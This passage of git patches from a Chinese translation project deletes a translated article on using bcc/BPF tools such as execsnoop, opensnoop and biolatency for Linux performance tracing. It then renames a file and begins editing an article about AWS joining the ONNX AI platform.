+[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://opensource.com/participate +[7]:https://opensource.com/users/brendang +[8]:https://opensource.com/users/brendang +[9]:https://opensource.com/user/77626/feed +[10]:https://opensource.com/article/17/11/bccbpf-performance?rate=r9hnbg3mvjFUC9FiBk9eL_ZLkioSC21SvICoaoJjaSM +[11]:https://opensource.com/article/17/11/bccbpf-performance#comments +[12]:https://github.com/iovisor/bcc +[13]:https://opensource.com/file/376856 +[14]:https://opensource.com/usr/share/bcc/tools/trace +[15]:https://github.com/brendangregg/perf-tools/blob/master/execsnoop +[16]:https://github.com/brendangregg/perf-tools/blob/master/opensnoop +[17]:https://github.com/iovisor/bcc/blob/master/tools/xfsslower.py +[18]:https://github.com/iovisor/bcc/blob/master/tools/biolatency.py +[19]:https://github.com/iovisor/bcc/blob/master/tools/tcplife.py +[20]:https://github.com/iovisor/bcc/blob/master/tools/gethostlatency.py +[21]:https://github.com/iovisor/bcc/blob/master/tools/trace.py +[22]:https://github.com/iovisor/bcc/blob/master/INSTALL.md#fedora---binary +[23]:https://www.iovisor.org/ +[24]:https://opensource.com/article/17/11/bccbpf-performance#InstallViaSource +[25]:https://github.com/iovisor/bcc/issues/1221 +[26]:https://reviews.llvm.org/rL302055 +[27]:https://github.com/iovisor/bcc/blob/master/INSTALL.md#fedora---source +[28]:https://github.com/iovisor/bcc +[29]:https://github.com/iovisor/ply +[30]:https://github.com/ajor/bpftrace +[31]:https://sourceware.org/systemtap/ +[32]:https://sourceware.org/ml/systemtap/2017-q4/msg00096.html +[33]:https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md +[34]:https://github.com/iovisor/bcc/blob/master/tools/funccount_example.txt +[35]:https://github.com/iovisor/bcc/blob/master/tools/funclatency_example.txt +[36]:https://github.com/iovisor/bcc/blob/master/tools/funcslower_example.txt +[37]:https://github.com/iovisor/bcc/blob/master/tools/stackcount_example.txt +[38]:https://github.com/iovisor/bcc/blob/master/tools/trace_example.txt +[39]:https://github.com/iovisor/bcc/blob/master/tools/argdist_example.txt +[40]:http://opensource.com/ +[41]:https://opensource.com/tags/linux +[42]:https://opensource.com/tags/sysadmin +[43]:https://opensource.com/users/brendang +[44]:https://opensource.com/users/brendang From 73ef25de5cea559dcfdd98f593c9b76db3b0efc1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Mon, 11 Dec 2017 08:26:34 +0800 Subject: [PATCH 0482/1627] Delete 20171207 7 tools for analyzing performance in Linux with bccBPF.md --- ...lyzing performance in Linux with bccBPF.md | 422 ------------------ 1 file changed, 422 deletions(-) delete mode 100644 sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md diff --git a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md b/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md deleted file mode 100644 index 4e55ed979a..0000000000 --- a/sources/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md +++ /dev/null @@ -1,422 +0,0 @@ -translating by yongshouzhang - - -7个 Linux 下使用 bcc/BPF 的性能分析工具 -============================================================ - -###使用伯克利的包过滤(BPF)编译器集合(BCC)工具深度探查你的 linux 代码。 - - [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/pictures/brendan_face2017_620d.jpg?itok=xZzBQNcY)][7] 21 Nov 2017 [Brendan Gregg][8] [Feed][9] - -43[up][10] - - [4 comments][11] -![7 superpowers for Fedora bcc/BPF performance analysis](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/penguins%20in%20space_0.jpg?itok=umpCTAul) - -图片来源 : - -opensource.com - -在 linux 中出现的一种新技术能够为系统管理员和开发者提供大量用于性能分析和故障排除的新工具和仪表盘。 它被称为增强的伯克利数据包过滤器(eBPF,或BPF),虽然这些改进并不由伯克利开发,它们不仅仅是处理数据包,更多的是过滤。我将讨论在 Fedora 和 Red Hat Linux 发行版中使用 BPF 的一种方法,并在 Fedora 26 上演示。 - -BPF 可以在内核中运行用户定义的沙盒程序,以立即添加新的自定义功能。这就像可按需给 Linux 系统添加超能力一般。 你可以使用它的例子包括如下: - -* 高级性能跟踪工具:文件系统操作、TCP事件、用户级事件等的编程低开销检测。 - -* 网络性能 : 尽早丢弃数据包以提高DDoS的恢复能力,或者在内核中重定向数据包以提高性能。 - -* 安全监控 : 24x7 小时全天候自定义检测和记录内核空间与用户空间内的可疑事件。 - -在可能的情况下,BPF 程序必须通过一个内核验证机制来保证它们的安全运行,这比写自定义的内核模块更安全。我在此假设大多数人并不编写自己的 BPF 程序,而是使用别人写好的。在 GitHub 上的 [BPF Compiler Collection (bcc)][12] 项目中,我已发布许多开源代码。bcc 提供不同的 BPF 开发前端支持,包括Python和Lua,并且是目前最活跃的 BPF 模具项目。 - -### 7 个有用的 bcc/BPF 新工具 - -为了了解BCC / BPF工具和他们的乐器,我创建了下面的图表并添加到项目中 -To understand the bcc/BPF tools and what they instrument, I created the following diagram and added it to the bcc project: - -### [bcc_跟踪工具.png][13] - -![Linux bcc/BPF 跟踪工具图](https://opensource.com/sites/default/files/u128651/bcc_tracing_tools.png) - -Brendan Gregg, [CC BY-SA 4.0][14] - -这些是命令行界面工具,你可以通过 SSH (安全外壳)使用它们。目前大多数分析,包括我的老板,是用 GUIs 和仪表盘进行的。SSH是最后的手段。但这些命令行工具仍然是预览BPF能力的好方法,即使你最终打算通过一个可用的 GUI 使用它。我已着手向一个开源 GUI 添加BPF功能,但那是另一篇文章的主题。现在我想分享你今天可以使用的 CLI 工具。 - -### 1\. execsnoop - -从哪儿开始? 如何查看新的进程。这些可以消耗系统资源,但很短暂,它们不会出现在 top(1)命令或其他工具中。 这些新进程可以使用[execsnoop] [15]进行检测(或使用行业术语,可以追踪)。 在追踪时,我将在另一个窗口中通过 SSH 登录: - -``` -# /usr/share/bcc/tools/execsnoop -PCOMM PID PPID RET ARGS -sshd 12234 727 0 /usr/sbin/sshd -D -R -unix_chkpwd 12236 12234 0 /usr/sbin/unix_chkpwd root nonull -unix_chkpwd 12237 12234 0 /usr/sbin/unix_chkpwd root chkexpiry -bash 12239 12238 0 /bin/bash -id 12241 12240 0 /usr/bin/id -un -hostname 12243 12242 0 /usr/bin/hostname -pkg-config 12245 12244 0 /usr/bin/pkg-config --variable=completionsdir bash-completion -grepconf.sh 12246 12239 0 /usr/libexec/grepconf.sh -c -grep 12247 12246 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS -tty 12249 12248 0 /usr/bin/tty -s -tput 12250 12248 0 /usr/bin/tput colors -dircolors 12252 12251 0 /usr/bin/dircolors --sh /etc/DIR_COLORS -grep 12253 12239 0 /usr/bin/grep -qi ^COLOR.*none /etc/DIR_COLORS -grepconf.sh 12254 12239 0 /usr/libexec/grepconf.sh -c -grep 12255 12254 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS -grepconf.sh 12256 12239 0 /usr/libexec/grepconf.sh -c -grep 12257 12256 0 /usr/bin/grep -qsi ^COLOR.*none /etc/GREP_COLORS -``` -哇。 那是什么? 什么是grepconf.sh? 什么是 /etc/GREP_COLORS? 而且 grep通过运行自身阅读它自己的配置文件? 这甚至是如何工作的? - -欢迎来到有趣的系统追踪世界。 你可以学到很多关于系统是如何工作的(或者一些情况下根本不工作),并且发现一些简单的优化。 execsnoop 通过跟踪 exec()系统调用来工作,exec() 通常用于在新进程中加载不同的程序代码。 - -### 2\. opensnoop - -从上面继续,所以,grepconf.sh可能是一个shell脚本,对吧? 我将运行file(1)来检查,并使用[opensnoop][16] bcc 工具来查看打开的文件: - -``` -# /usr/share/bcc/tools/opensnoop -PID COMM FD ERR PATH -12420 file 3 0 /etc/ld.so.cache -12420 file 3 0 /lib64/libmagic.so.1 -12420 file 3 0 /lib64/libz.so.1 -12420 file 3 0 /lib64/libc.so.6 -12420 file 3 0 /usr/lib/locale/locale-archive -12420 file -1 2 /etc/magic.mgc -12420 file 3 0 /etc/magic -12420 file 3 0 /usr/share/misc/magic.mgc -12420 file 3 0 /usr/lib64/gconv/gconv-modules.cache -12420 file 3 0 /usr/libexec/grepconf.sh -1 systemd 16 0 /proc/565/cgroup -1 systemd 16 0 /proc/536/cgroup -``` -像execsnoop和opensnoop这样的工具每个事件打印一行。上图显示 file(1)命令当前打开(或尝试打开)的文件:返回的文件描述符(“FD”列)对于 /etc/magic.mgc 是-1,而“ERR”列指示它是“文件未找到”。我不知道该文件,也不知道 file(1)正在读取的 /usr/share/misc/magic.mgc 文件。我不应该感到惊讶,但是 file(1)在识别文件类型时没有问题: - -``` -# file /usr/share/misc/magic.mgc /etc/magic -/usr/share/misc/magic.mgc: magic binary file for file(1) cmd (version 14) (little endian) -/etc/magic: magic text file for file(1) cmd, ASCII text -``` -opensnoop通过跟踪 open()系统调用来工作。为什么不使用 strace -feopen file 命令呢? 这将在这种情况下起作用。然而,opensnoop 的一些优点在于它能在系统范围内工作,并且跟踪所有进程的 open()系统调用。注意上例的输出中包括了从systemd打开的文件。Opensnoop 也应该有更低的开销:BPF 跟踪已经被优化,并且当前版本的 strace(1)仍然使用较老和较慢的 ptrace(2)接口。 - -### 3\. xfsslower - -bcc/BPF 不仅仅可以分析系统调用。[xfsslower][17] 工具跟踪具有大于1毫秒(参数)延迟的常见XFS文件系统操作。 - -``` -# /usr/share/bcc/tools/xfsslower 1 -Tracing XFS operations slower than 1 ms -TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME -14:17:34 systemd-journa 530 S 0 0 1.69 system.journal -14:17:35 auditd 651 S 0 0 2.43 audit.log -14:17:42 cksum 4167 R 52976 0 1.04 at -14:17:45 cksum 4168 R 53264 0 1.62 [ -14:17:45 cksum 4168 R 65536 0 1.01 certutil -14:17:45 cksum 4168 R 65536 0 1.01 dir -14:17:45 cksum 4168 R 65536 0 1.17 dirmngr-client -14:17:46 cksum 4168 R 65536 0 1.06 grub2-file -14:17:46 cksum 4168 R 65536 128 1.01 grub2-fstest -[...] -``` -在上图输出中,我捕获了多个延迟超过 1 毫秒 的 cksum(1)读数(字段“T”等于“R”)。这个工作是在 xfsslower 工具运行的时候,通过在 XFS 中动态地设置内核函数实现,当它结束的时候解除检测。其他文件系统也有这个 bcc 工具的版本:ext4slower,btrfsslower,zfsslower 和 nfsslower。 - -这是个有用的工具,也是 BPF 追踪的重要例子。对文件系统性能的传统分析主要集中在块 I/O 统计信息 - 通常你看到的是由 iostat(1)工具打印并由许多性能监视 GUI 绘制的图表。这些统计数据显示了磁盘如何执行,但不是真正的文件系统。通常比起磁盘你更关心文件系统的性能,因为应用程序是在文件系统中发起请求和等待。并且文件系统的性能可能与磁盘的性能大为不同!文件系统可以完全从内存缓存中读取数据,也可以通过预读算法和回写缓存填充缓存。xfsslower 显示了文件系统的性能 - 应用程序直接体验到什么。这对于免除整个存储子系统通常是有用的; 如果确实没有文件系统延迟,那么性能问题很可能在别处。 - -### 4\. biolatency - -虽然文件系统性能对于理解应用程序性能非常重要,但研究磁盘性能也是有好处的。当各种缓存技巧不能再隐藏其延迟时,磁盘的低性能终会影响应用程序。 磁盘性能也是容量规划研究的目标。 - -iostat(1)工具显示平均磁盘 I/O 延迟,但平均值可能会引起误解。 以直方图的形式研究 I/O 延迟的分布是有用的,这可以通过使用 [biolatency] 来实现[18]: - -``` -# /usr/share/bcc/tools/biolatency -Tracing block device I/O... Hit Ctrl-C to end. -^C - usecs : count distribution - 0 -> 1 : 0 | | - 2 -> 3 : 0 | | - 4 -> 7 : 0 | | - 8 -> 15 : 0 | | - 16 -> 31 : 0 | | - 32 -> 63 : 1 | | - 64 -> 127 : 63 |**** | - 128 -> 255 : 121 |********* | - 256 -> 511 : 483 |************************************ | - 512 -> 1023 : 532 |****************************************| - 1024 -> 2047 : 117 |******** | - 2048 -> 4095 : 8 | | -``` -这是另一个有用的工具和例子; 它使用一个名为maps的BPF特性,它可以用来实现高效的内核内摘要统计。从内核级别到用户级别的数据传输仅仅是“计数”列。 用户级程序生成其余的。 - -值得注意的是,其中许多工具支持CLI选项和参数,如其使用信息所示: - -``` -# /usr/share/bcc/tools/biolatency -h -usage: biolatency [-h] [-T] [-Q] [-m] [-D] [interval] [count] - -Summarize block device I/O latency as a histogram - -positional arguments: - interval output interval, in seconds - count number of outputs - -optional arguments: - -h, --help show this help message and exit - -T, --timestamp include timestamp on output - -Q, --queued include OS queued time in I/O time - -m, --milliseconds millisecond histogram - -D, --disks print a histogram per disk device - -examples: - ./biolatency # summarize block I/O latency as a histogram - ./biolatency 1 10 # print 1 second summaries, 10 times - ./biolatency -mT 1 # 1s summaries, milliseconds, and timestamps - ./biolatency -Q # include OS queued time in I/O time - ./biolatency -D # show each disk device separately -``` -它们的行为像其他Unix工具是通过设计,以协助采用。 - -### 5\. tcplife - -另一个有用的工具是[tcplife][19] ,该例显示TCP会话的生命周期和吞吐量统计 - -``` -# /usr/share/bcc/tools/tcplife -PID COMM LADDR LPORT RADDR RPORT TX_KB RX_KB MS -12759 sshd 192.168.56.101 22 192.168.56.1 60639 2 3 1863.82 -12783 sshd 192.168.56.101 22 192.168.56.1 60640 3 3 9174.53 -12844 wget 10.0.2.15 34250 54.204.39.132 443 11 1870 5712.26 -12851 curl 10.0.2.15 34252 54.204.39.132 443 0 74 505.90 -``` -在你说:“我不能只是刮 tcpdump(8)输出这个?”之前请注意,运行 tcpdump(8)或任何数据包嗅探器,在高数据包速率系统上花费的开销会很大,即使tcpdump(8)的用户级和内核级机制已经过多年优化(可能更差)。tcplife不会测试每个数据包; 它只会监视TCP会话状态的变化,从而影响会话的持续时间。它还使用已经跟踪吞吐量的内核计数器,以及处理和命令信息(“PID”和“COMM”列),这些对 tcpdump(8)等线上嗅探工具是做不到的。 - -### 6\. gethostlatency - -之前的每个例子都涉及到内核跟踪,所以我至少需要一个用户级跟踪的例子。 这是[gethostlatency] [20],其中gethostbyname(3)和相关的库调用名称解析: - -``` -# /usr/share/bcc/tools/gethostlatency -TIME PID COMM LATms HOST -06:43:33 12903 curl 188.98 opensource.com -06:43:36 12905 curl 8.45 opensource.com -06:43:40 12907 curl 6.55 opensource.com -06:43:44 12911 curl 9.67 opensource.com -06:45:02 12948 curl 19.66 opensource.cats -06:45:06 12950 curl 18.37 opensource.cats -06:45:07 12952 curl 13.64 opensource.cats -06:45:19 13139 curl 13.10 opensource.cats -``` -是的,它始终是DNS,所以有一个工具来监视系统范围内的DNS请求可以很方便(这只有在应用程序使用标准系统库时才有效)看看我如何跟踪多个查找“opensource.com”? 第一个是188.98毫秒,然后是更快,不到10毫秒,毫无疑问,缓存的作用。它还追踪多个查找“opensource.cats”,一个可悲的不存在的主机,但我们仍然可以检查第一个和后续查找的延迟。 (第二次查找后是否有一点负面缓存?) - -### 7\. trace - -好的,再举一个例子。 [trace] [21]工具由Sasha Goldshtein提供,并提供了一些基本的printf(1)功能和自定义探针。 例如: - -``` -# /usr/share/bcc/tools/trace 'pam:pam_start "%s: %s", arg1, arg2' -PID TID COMM FUNC - -13266 13266 sshd pam_start sshd: root -``` -在这里,我正在跟踪 libpam 及其 pam_start(3)函数并将其两个参数都打印为字符串。 Libpam 用于可插入的身份验证模块系统,输出显示 sshd 为“root”用户(我登录)调用了 pam_start()。 USAGE消息中有更多的例子(“trace -h”),而且所有这些工具在bcc版本库中都有手册页和示例文件。 例如trace_example.txt和trace.8。 - -### 通过包安装 bcc - -安装 bcc 最佳的方法是从 iovisor 仓储库中安装,按照 bcc [INSTALL.md][22]。[IO Visor] [23]是包含 bcc 的Linux基金会项目。4.x系列Linux内核中增加了这些工具使用的BPF增强功能,上至4.9 \。这意味着拥有4.8内核的 Fedora 25可以运行大部分这些工具。 Fedora 26及其4.11内核可以运行它们(至少目前)。 - -如果你使用的是Fedora 25(或者Fedora 26,而且这个帖子已经在很多个月前发布了 - 你好,来自遥远的过去!),那么这个包的方法应该是正常的。 如果您使用的是Fedora 26,那么请跳至“通过源代码安装”部分,该部分避免了已知的固定错误。 这个错误修复目前还没有进入Fedora 26软件包的依赖关系。 我使用的系统是: - -``` -# uname -a -Linux localhost.localdomain 4.11.8-300.fc26.x86_64 #1 SMP Thu Jun 29 20:09:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux -# cat /etc/fedora-release -Fedora release 26 (Twenty Six) -``` -以下是我所遵循的安装步骤,但请参阅INSTALL.md获取更新的版本: - -``` -# echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f25/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo -# dnf install bcc-tools -[...] -Total download size: 37 M -Installed size: 143 M -Is this ok [y/N]: y -``` -安装完成后,您可以在/ usr / share中看到新的工具: - -``` -# ls /usr/share/bcc/tools/ -argdist dcsnoop killsnoop softirqs trace -bashreadline dcstat llcstat solisten ttysnoop -[...] -``` -试着运行其中一个: - -``` -# /usr/share/bcc/tools/opensnoop -chdir(/lib/modules/4.11.8-300.fc26.x86_64/build): No such file or directory -Traceback (most recent call last): - File "/usr/share/bcc/tools/opensnoop", line 126, in - b = BPF(text=bpf_text) - File "/usr/lib/python3.6/site-packages/bcc/__init__.py", line 284, in __init__ - raise Exception("Failed to compile BPF module %s" % src_file) -Exception: Failed to compile BPF module -``` -运行失败,提示/lib/modules/4.11.8-300.fc26.x86_64/build丢失。 如果你也这样做,那只是因为系统缺少内核头文件。 如果你看看这个文件指向什么(这是一个符号链接),然后使用“dnf whatprovides”来搜索它,它会告诉你接下来需要安装的包。 对于这个系统,它是: - -``` -# dnf install kernel-devel-4.11.8-300.fc26.x86_64 -[...] -Total download size: 20 M -Installed size: 63 M -Is this ok [y/N]: y -[...] -``` -现在 - -``` -# /usr/share/bcc/tools/opensnoop -PID COMM FD ERR PATH -11792 ls 3 0 /etc/ld.so.cache -11792 ls 3 0 /lib64/libselinux.so.1 -11792 ls 3 0 /lib64/libcap.so.2 -11792 ls 3 0 /lib64/libc.so.6 -[...] -``` -运行起来了。 这是从另一个窗口中的ls命令捕捉活动。 请参阅前面的部分以获取其他有用的命令 - -### 通过源码安装 - -如果您需要从源代码安装,您还可以在[INSTALL.md] [27]中找到文档和更新说明。 我在Fedora 26上做了如下的事情: - -``` -sudo dnf install -y bison cmake ethtool flex git iperf libstdc++-static \ - python-netaddr python-pip gcc gcc-c++ make zlib-devel \ - elfutils-libelf-devel -sudo dnf install -y luajit luajit-devel # for Lua support -sudo dnf install -y \ - http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm -sudo pip install pyroute2 -sudo dnf install -y clang clang-devel llvm llvm-devel llvm-static ncurses-devel -``` -除 netperf 外一切妥当,其中有以下错误: - -``` -Curl error (28): Timeout was reached for http://pkgs.repoforge.org/netperf/netperf-2.6.0-1.el6.rf.x86_64.rpm [Connection timed out after 120002 milliseconds] -``` - -不必理会,netperf是可选的 - 它只是用于测试 - 而 bcc 没有它也会编译成功。 - -以下是 bcc 编译和安装余下的步骤: - - -``` -git clone https://github.com/iovisor/bcc.git -mkdir bcc/build; cd bcc/build -cmake .. -DCMAKE_INSTALL_PREFIX=/usr -make -sudo make install -``` -在这一点上,命令应该起作用: - -``` -# /usr/share/bcc/tools/opensnoop -PID COMM FD ERR PATH -4131 date 3 0 /etc/ld.so.cache -4131 date 3 0 /lib64/libc.so.6 -4131 date 3 0 /usr/lib/locale/locale-archive -4131 date 3 0 /etc/localtime -[...] -``` - -More Linux resources - -* [What is Linux?][1] - -* [What are Linux containers?][2] - -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -### 写在最后和其他前端 - -这是一个可以在 Fedora 和 Red Hat 系列操作系统上使用的新 BPF 性能分析强大功能的快速浏览。我演示了BPF的流行前端 [bcc][28] ,并包含了其在 Fedora 上的安装说明。bcc 附带了60多个用于性能分析的新工具,这将帮助您充分利用Linux系统。也许你会直接通过SSH使用这些工具,或者一旦它们支持BPF,你也可以通过监视GUI来使用相同的功能。 - -此外,bcc并不是开发中唯一的前端。[ply][29]和[bpftrace][30],旨在为快速编写自定义工具提供更高级的语言。此外,[SystemTap] [31]刚刚发布[版本3.2] [32],包括一个早期的实验性eBPF后端。 如果这一点继续得到发展,它将为运行多年来开发的许多SystemTap脚本和攻击集(库)提供一个生产安全和高效的引擎。 (使用SystemTap和eBPF将成为另一篇文章的主题。) - -如果您需要开发自定义工具,那么也可以使用 bcc 来实现,尽管语言比 SystemTap,ply 或 bpftrace 要冗长得多。 我的 bcc 工具可以作为代码示例,另外我还贡献了[教程] [33]来开发 Python 中的 bcc 工具。 我建议先学习bcc多工具,因为在需要编写新工具之前,你可能会从里面获得很多里程。 您可以从他们 bcc 存储库[funccount] [34],[funclatency] [35],[funcslower] [36],[stackcount] [37],[trace] [38] ,[argdist] [39] 的示例文件中研究 bcc。 - -感谢[Opensource.com] [40]进行编辑。 - -###  专题 - - [Linux][41][系统管理员][42] - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/brendan_face2017_620d.jpg?itok=LIwTJjL9)][43] Brendan Gregg - -- -Brendan Gregg是Netflix的一名高级性能架构师,在那里他进行大规模的计算机性能设计,分析和调优。[关于更多] [44] - - -* [Learn how you can contribute][6] - --------------------------------------------------------------------------------- - -via:https://opensource.com/article/17/11/bccbpf-performance - -作者:[Brendan Gregg ][a] -译者:[yongshouzhang](https://github.com/yongshouzhang) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/participate -[7]:https://opensource.com/users/brendang -[8]:https://opensource.com/users/brendang -[9]:https://opensource.com/user/77626/feed -[10]:https://opensource.com/article/17/11/bccbpf-performance?rate=r9hnbg3mvjFUC9FiBk9eL_ZLkioSC21SvICoaoJjaSM -[11]:https://opensource.com/article/17/11/bccbpf-performance#comments -[12]:https://github.com/iovisor/bcc -[13]:https://opensource.com/file/376856 -[14]:https://opensource.com/usr/share/bcc/tools/trace -[15]:https://github.com/brendangregg/perf-tools/blob/master/execsnoop -[16]:https://github.com/brendangregg/perf-tools/blob/master/opensnoop -[17]:https://github.com/iovisor/bcc/blob/master/tools/xfsslower.py -[18]:https://github.com/iovisor/bcc/blob/master/tools/biolatency.py -[19]:https://github.com/iovisor/bcc/blob/master/tools/tcplife.py -[20]:https://github.com/iovisor/bcc/blob/master/tools/gethostlatency.py -[21]:https://github.com/iovisor/bcc/blob/master/tools/trace.py -[22]:https://github.com/iovisor/bcc/blob/master/INSTALL.md#fedora---binary -[23]:https://www.iovisor.org/ -[24]:https://opensource.com/article/17/11/bccbpf-performance#InstallViaSource -[25]:https://github.com/iovisor/bcc/issues/1221 -[26]:https://reviews.llvm.org/rL302055 -[27]:https://github.com/iovisor/bcc/blob/master/INSTALL.md#fedora---source -[28]:https://github.com/iovisor/bcc -[29]:https://github.com/iovisor/ply -[30]:https://github.com/ajor/bpftrace -[31]:https://sourceware.org/systemtap/ -[32]:https://sourceware.org/ml/systemtap/2017-q4/msg00096.html -[33]:https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md -[34]:https://github.com/iovisor/bcc/blob/master/tools/funccount_example.txt -[35]:https://github.com/iovisor/bcc/blob/master/tools/funclatency_example.txt -[36]:https://github.com/iovisor/bcc/blob/master/tools/funcslower_example.txt -[37]:https://github.com/iovisor/bcc/blob/master/tools/stackcount_example.txt -[38]:https://github.com/iovisor/bcc/blob/master/tools/trace_example.txt -[39]:https://github.com/iovisor/bcc/blob/master/tools/argdist_example.txt -[40]:http://opensource.com/ -[41]:https://opensource.com/tags/linux -[42]:https://opensource.com/tags/sysadmin -[43]:https://opensource.com/users/brendang -[44]:https://opensource.com/users/brendang From a9d22d528f3a3647a03b14de77103b18a266af4e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Mon, 11 Dec 2017 08:38:16 +0800 Subject: [PATCH 0483/1627] Rename 20171121 7 tools for analyzing performance in Linux with bccBPF.md to 20171207 7 tools for analyzing performance in Linux with bccBPF.md --- ...207 7 tools for analyzing performance in Linux with bccBPF.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/tech/{20171121 7 tools for analyzing performance in Linux with bccBPF.md => 20171207 7 tools for analyzing performance in Linux with bccBPF.md} (100%) diff --git a/translated/tech/20171121 7 tools for analyzing performance in Linux with bccBPF.md b/translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md similarity index 100% rename from translated/tech/20171121 7 tools for analyzing performance in Linux with bccBPF.md rename to translated/tech/20171207 7 tools for analyzing performance in Linux with bccBPF.md From cbd51ce9ec57b0826b8613d89ce0a63b74d11daa Mon Sep 17 00:00:00 2001 From: wxy Date: Mon, 11 Dec 2017 08:43:06 +0800 Subject: [PATCH 0484/1627] PRF&PUB:20171125 AWS to Help Build ONNX Open Source AI Platform.md @geekpi https://linux.cn/article-9129-1.html --- ...Help Build ONNX Open Source AI Platform.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) rename {translated/tech => published}/20171125 AWS to Help Build ONNX Open Source AI Platform.md (77%) diff --git a/translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/published/20171125 AWS to Help Build ONNX Open Source AI Platform.md similarity index 77% rename from translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md rename to published/20171125 AWS to Help Build ONNX Open Source AI Platform.md index 8f80387e82..d847db3366 100644 --- a/translated/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md +++ b/published/20171125 AWS to Help Build ONNX Open Source AI Platform.md @@ -3,27 +3,27 @@ AWS 帮助构建 ONNX 开源 AI 平台 ![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) -AWS 已经成为最近加入深度学习社区的开放神经网络交换(ONNX)协作的最新技术公司,最近在无摩擦和可互操作的环境中推出了高级人工智能。由 Facebook 和微软领头。 +AWS 最近成为了加入深度学习社区的开放神经网络交换Open Neural Network Exchange(ONNX)协作的技术公司,最近在无障碍和可互操作frictionless and interoperable的环境中推出了高级人工智能。由 Facebook 和微软领头了该协作。 -作为该合作的一部分,AWS 将其开源 Python 软件包 ONNX-MxNet 作为一个深度学习框架提供,该框架提供跨多种语言的编程接口,包括 Python、Scala 和开源统计软件 R。 +作为该合作的一部分,AWS 开源其深度学习框架 Python 软件包 ONNX-MXNet,该框架提供了跨多种语言的编程接口(API),包括 Python、Scala 和开源统计软件 R。 -AWS 深度学习工程经理 Hagay Lupesko 和软件开发人员 Roshani Nagmote 上周在一篇帖子中写道:ONNX 格式将帮助开发人员构建和训练其他框架的模型,包括 PyTorch、Microsoft Cognitive Toolkit 或 Caffe2。它可以让开发人员将这些模型导入 MXNet,并运行它们进行推理。 +AWS 深度学习工程经理 Hagay Lupesko 和软件开发人员 Roshani Nagmote 上周在一篇帖子中写道,ONNX 格式将帮助开发人员构建和训练其它框架的模型,包括 PyTorch、Microsoft Cognitive Toolkit 或 Caffe2。它可以让开发人员将这些模型导入 MXNet,并运行它们进行推理。 ### 对开发者的帮助 今年夏天,Facebook 和微软推出了 ONNX,以支持共享模式的互操作性,来促进 AI 的发展。微软提交了其 Cognitive Toolkit、Caffe2 和 PyTorch 来支持 ONNX。 -微软表示:Cognitive Toolkit 和其他框架使开发人员更容易构建和运行代表神经网络的计算图。 +微软表示:Cognitive Toolkit 和其他框架使开发人员更容易构建和运行计算图以表达神经网络。 -Github 上提供了[ ONNX 代码和文档][4]的初始版本。 +[ONNX 代码和文档][4]的初始版本已经放到了 Github。 AWS 和微软上个月宣布了在 Apache MXNet 上的一个新 Gluon 接口计划,该计划允许开发人员构建和训练深度学习模型。 -[Tractica][5] 的研究总监 Aditya Kaul 观察到:“Gluon 是他们与 Google 的 Tensorflow 竞争的合作伙伴关系的延伸”。 +[Tractica][5] 的研究总监 Aditya Kaul 观察到:“Gluon 是他们试图与 Google 的 Tensorflow 竞争的合作伙伴关系的延伸”。 -他告诉 LinuxInsider,“谷歌在这点上的疏忽是非常明显的,但也说明了他们在市场上的主导地位。 +他告诉 LinuxInsider,“谷歌在这点上的疏忽是非常明显的,但也说明了他们在市场上的主导地位。” -Kaul 说:“甚至 Tensorflow 是开源的,所以开源在这里并不是什么大事,但这归结到底是其他生态系统联手与谷歌竞争。” +Kaul 说:“甚至 Tensorflow 也是开源的,所以开源在这里并不是什么大事,但这归结到底是其他生态系统联手与谷歌竞争。” 根据 AWS 